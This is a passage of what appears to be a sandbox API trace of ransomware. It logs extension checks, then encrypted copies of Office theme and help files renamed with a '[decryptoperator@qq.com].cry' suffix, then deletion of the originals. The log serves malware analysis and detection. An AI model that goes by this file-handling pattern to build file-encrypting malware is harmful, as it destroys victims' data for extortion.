(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.828] lstrlenW (lpString=".doc") returned 4 [0047.828] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.828] lstrlenW (lpString=".docx") returned 5 [0047.828] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.828] lstrlenW (lpString=".pdf") returned 4 [0047.828] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.828] lstrlenW (lpString=".xls") returned 4 [0047.828] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.828] lstrlenW (lpString=".xlsx") returned 5 [0047.828] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.828] lstrlenW (lpString=".ppt") returned 4 [0047.828] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.828] lstrlenW (lpString=".zip") returned 4 [0047.828] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.828] lstrlenW (lpString=".rar") returned 4 [0047.828] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.828] lstrlenW (lpString=".bz2") returned 4 [0047.828] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.828] lstrlenW (lpString=".7z") returned 3 [0047.828] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.829] lstrlenW (lpString=".dbf") returned 4 [0047.829] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.829] lstrlenW (lpString=".1cd") returned 4 [0047.829] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0047.829] lstrlenW (lpString=".jpg") returned 4 [0047.829] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.829] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.829] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.829] GetLastError () returned 0x0 [0047.829] ReadFile (in: hFile=0x208, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x6a29, lpOverlapped=0x0) returned 1 [0047.890] WriteFile (in: hFile=0x200, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x6a30, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x6a30, lpOverlapped=0x0) returned 1 [0047.891] ReadFile (in: hFile=0x208, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.891] WriteFile (in: hFile=0x200, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.891] SetEndOfFile (hFile=0x200) returned 1 [0047.892] CloseHandle (hObject=0x200) returned 1 [0047.892] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.892] SetEndOfFile (hFile=0x208) returned 1 [0047.893] CloseHandle (hObject=0x208) returned 1 [0047.893] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.893] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 1 [0047.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.893] lstrlenW (lpString=".doc") returned 4 [0047.893] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.893] lstrlenW (lpString=".docx") returned 5 [0047.893] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.893] lstrlenW (lpString=".pdf") returned 4 [0047.893] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.894] lstrlenW (lpString=".xls") returned 4 [0047.894] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.894] lstrlenW (lpString=".xlsx") returned 5 [0047.894] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.894] lstrlenW (lpString=".ppt") returned 4 [0047.894] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.894] lstrlenW (lpString=".zip") returned 4 [0047.894] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.894] lstrlenW (lpString=".rar") returned 4 [0047.894] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.894] lstrlenW (lpString=".bz2") returned 4 [0047.894] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.894] lstrlenW (lpString=".7z") returned 3 [0047.894] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.894] lstrlenW (lpString=".dbf") returned 4 [0047.894] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.894] lstrlenW (lpString=".1cd") returned 4 [0047.894] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.894] lstrlenW (lpString=".jpg") returned 4 [0047.895] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.153] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.154] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0048.154] GetLastError () returned 0x0 [0048.154] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x5534, lpOverlapped=0x0) returned 1 [0048.243] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x5540, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x5540, lpOverlapped=0x0) returned 1 [0048.244] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.244] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.245] SetEndOfFile (hFile=0x164) returned 1 [0048.245] CloseHandle (hObject=0x164) returned 1 [0048.245] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.245] SetEndOfFile (hFile=0x1c4) returned 1 [0048.246] CloseHandle (hObject=0x1c4) returned 1 [0048.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.246] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 1 [0048.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.246] lstrlenW (lpString=".doc") returned 4 [0048.246] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.246] lstrlenW (lpString=".docx") returned 5 [0048.246] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.246] lstrlenW (lpString=".pdf") returned 4 [0048.246] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.246] lstrlenW (lpString=".xls") returned 4 [0048.246] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.246] lstrlenW (lpString=".xlsx") returned 5 [0048.246] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.246] lstrlenW (lpString=".ppt") returned 4 [0048.246] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.247] lstrlenW (lpString=".zip") returned 4 [0048.247] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.247] lstrlenW (lpString=".rar") returned 4 [0048.247] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.247] lstrlenW (lpString=".bz2") returned 4 [0048.247] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.247] lstrlenW (lpString=".7z") returned 3 [0048.247] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.247] lstrlenW (lpString=".dbf") returned 4 [0048.247] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.247] lstrlenW (lpString=".1cd") returned 4 [0048.247] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.247] lstrlenW (lpString=".jpg") returned 4 [0048.247] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.332] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.333] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0048.494] GetLastError () returned 0x0 [0048.494] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x4c45, lpOverlapped=0x0) returned 1 [0048.654] WriteFile (in: hFile=0x16c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x4c50, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x4c50, lpOverlapped=0x0) returned 1 [0048.655] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.655] WriteFile (in: hFile=0x16c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.655] SetEndOfFile (hFile=0x16c) returned 1 [0048.655] CloseHandle (hObject=0x16c) returned 1 [0048.655] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.655] SetEndOfFile (hFile=0x1c4) returned 1 [0048.656] CloseHandle (hObject=0x1c4) returned 1 [0048.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.656] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 1 [0048.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.657] lstrlenW (lpString=".doc") returned 4 [0048.657] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.657] lstrlenW (lpString=".docx") returned 5 [0048.657] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.657] lstrlenW (lpString=".pdf") returned 4 [0048.657] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.657] lstrlenW (lpString=".xls") returned 4 [0048.657] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.657] lstrlenW (lpString=".xlsx") returned 5 [0048.657] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.657] lstrlenW (lpString=".ppt") returned 4 [0048.657] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.657] lstrlenW (lpString=".zip") returned 4 [0048.657] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.657] lstrlenW (lpString=".rar") returned 4 [0048.657] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.657] lstrlenW (lpString=".bz2") returned 4 [0048.657] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.657] lstrlenW (lpString=".7z") returned 3 [0048.657] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.657] lstrlenW (lpString=".dbf") returned 4 [0048.657] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.657] lstrlenW (lpString=".1cd") returned 4 [0048.657] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.657] lstrlenW (lpString=".jpg") returned 4 [0048.657] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.658] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.658] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0049.031] GetLastError () returned 0x0 [0049.031] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xa6c, lpOverlapped=0x0) returned 1 [0049.373] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xa70, lpOverlapped=0x0) returned 1 [0049.374] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.374] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.374] SetEndOfFile (hFile=0x22c) returned 1 [0049.374] CloseHandle (hObject=0x22c) returned 1 [0049.374] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.374] SetEndOfFile (hFile=0x1c4) returned 1 [0049.375] CloseHandle (hObject=0x1c4) returned 1 [0049.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.375] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.376] lstrlenW (lpString=".doc") returned 4 [0049.376] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.376] lstrlenW (lpString=".docx") returned 5 [0049.376] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.376] lstrlenW (lpString=".pdf") returned 4 [0049.376] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.376] lstrlenW (lpString=".xls") returned 4 [0049.376] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.376] lstrlenW (lpString=".xlsx") returned 5 [0049.376] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.376] lstrlenW (lpString=".ppt") returned 4 [0049.376] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.376] lstrlenW (lpString=".zip") returned 4 [0049.376] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.376] lstrlenW (lpString=".rar") returned 4 [0049.376] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.376] lstrlenW (lpString=".bz2") returned 4 [0049.376] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.376] lstrlenW (lpString=".7z") returned 3 [0049.376] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.376] lstrlenW (lpString=".dbf") returned 4 [0049.376] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.376] lstrlenW (lpString=".1cd") returned 4 [0049.376] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.376] lstrlenW (lpString=".jpg") returned 4 [0049.376] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.381] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.381] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0049.381] GetLastError () returned 0x0 [0049.381] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x65c96, lpOverlapped=0x0) returned 1 [0049.419] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x65ca0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x65ca0, lpOverlapped=0x0) returned 1 [0049.426] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.426] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.427] SetEndOfFile (hFile=0x22c) returned 1 [0049.427] CloseHandle (hObject=0x22c) returned 1 [0049.427] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.427] SetEndOfFile (hFile=0x1c4) returned 1 [0049.430] CloseHandle (hObject=0x1c4) returned 1 [0049.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.431] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 1 [0049.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.431] lstrlenW (lpString=".doc") returned 4 [0049.431] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.431] lstrlenW (lpString=".docx") returned 5 [0049.431] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.431] lstrlenW (lpString=".pdf") returned 4 [0049.431] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.431] lstrlenW (lpString=".xls") returned 4 [0049.431] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.431] lstrlenW (lpString=".xlsx") returned 5 [0049.431] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.431] lstrlenW (lpString=".ppt") returned 4 [0049.431] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.431] lstrlenW (lpString=".zip") returned 4 [0049.431] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.431] lstrlenW (lpString=".rar") returned 4 [0049.431] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.431] lstrlenW (lpString=".bz2") returned 4 [0049.432] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.432] lstrlenW (lpString=".7z") returned 3 [0049.432] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.432] lstrlenW (lpString=".dbf") returned 4 [0049.432] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.432] lstrlenW (lpString=".1cd") returned 4 